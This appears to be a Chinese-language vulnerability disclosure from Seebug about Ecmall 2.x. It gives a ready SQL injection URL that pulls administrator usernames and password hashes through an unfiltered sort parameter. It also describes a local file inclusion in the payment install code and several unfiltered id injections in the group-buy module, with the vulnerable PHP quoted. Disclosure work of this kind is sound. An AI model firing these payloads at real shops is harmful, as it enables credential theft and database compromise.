Lucene search
RootSSV:93417HistoryFeb 28, 2014 - 12:00 a.m.
Ecmall 2.x 多处安全漏洞汇总
2014-02-2800:00:00
Root
www.seebug.org
24
简要描述:
一处通杀注入,同文件多处鸡肋注入,一处本地包含。累了不看了,体力活。。。
详细说明:
通杀注入:http://localhost/ecmall/index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23
app/my_goods.app.php
function brand_list()
{
$_GET['store_id'] = $this->_store_id;
$_GET['if_show'] = BRAND_PASSED;
$con = array(
array(
'field' => 'store_id',
'name' => 'store_id',
'equal' => '=',
),
array(
'field' => 'if_show',
'name' => 'if_show',
'equal' => '=',
'assoc' => 'or',
),);
$filtered = '';
if (!empty($_GET['brand_name']) || !empty($_GET['store']))
{
$_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";
$_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id;
}
if (isset($_GET['sort']) && isset($_GET['order']))
{
$sort = strtolower(trim($_GET['sort']));
$order = strtolower(trim($_GET['order']));
if (!in_array($order,array('asc','desc'))) //依然只过滤了order,没有过滤sort
{
$sort = 'store_id';
$order = 'desc';
}
}
else
{
$sort = 'store_id';
$order = 'desc';
}
$page = $this->_get_page(10);
$conditions = $this->_get_query_conditions($con);
$brand = $this->_brand_mod->find(array(
'conditions' => "(1=1 $conditions)" . $filtered,
'limit' => $page['limit'],
'order' => "$sort $order", //带入查询 order by参数注入.
'count' => true,
));
$page['item_count'] = $this->_brand_mod->getCount();
......
}
本地包含漏洞:http://localhost/ecmall/index.php?app=my_payment&act=install&code=wooyun
app/my_payment.app.php
function install()
{
$code = isset($_GET['code']) ? trim($_GET['code']) : 0; //没过滤
if (!$code)
{
echo Lang::get('no_such_payment');
return;
}
$model_payment =& m('payment');
$payment = $model_payment->get_builtin_info($code); //跟进
if (!$payment)
{
echo Lang::get('no_such_payment');
return;
}
$payment_info = $model_payment->get("store_id=" . $this->visitor->get('manage_store') . " AND payment_code='{$code}'");
if (!empty($payment_info))
{
echo Lang::get('already_installed');
return;
}
......
}
includes/models/paymet.model.php
<code>
function get_builtin_info($code)
{
Lang::load(lang_file('payment/' . $code));
$payment_path = ROOT_PATH . '/includes/payments/' . $code . '/payment.info.php';
return include($payment_path); //包含之.
}
鸡肋注入:http://localhost/ecmall/index.php?app=seller_groupbuy&act=edit&id=1’
http://localhost/ecmall/index.php?app=seller_groupbuy&act=xxxxxxxx&id=1’
需要开启团购活动
app/seller_groupbuy.app.php
function edit()
{
$id = empty($_GET['id']) ? 0 : $_GET['id']; //没过滤,下面还有很多类似的
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT)) //带入查询
{
$this->show_warning('Hacking Attempt');
return;
}
......
}
function drop()
{
$id = empty($_GET['id']) ? 0 : $_GET['id']; //下同
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT)) //下同
{
$this->show_warning('Hacking Attempt');
return;
}
......
}
function start()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
......
}
function finished()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
/* 团购信息 */
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id, //同样带入查询
'fields' => 'group_name',
));
......
}
function desc()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
......
/* 团购信息 */
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id,
'fields' => 'group_desc',
));
......
}
function cancel()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
/* 团购信息 */
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id,
'fields' => 'group_desc,group_name,owner_name',
'join' => 'belong_store'
));
}
function log()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT)) {
$this->show_warning('Hacking Attempt');
return;
}
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id,
'fields' => 'group_desc, group_name, goods_id',
));
}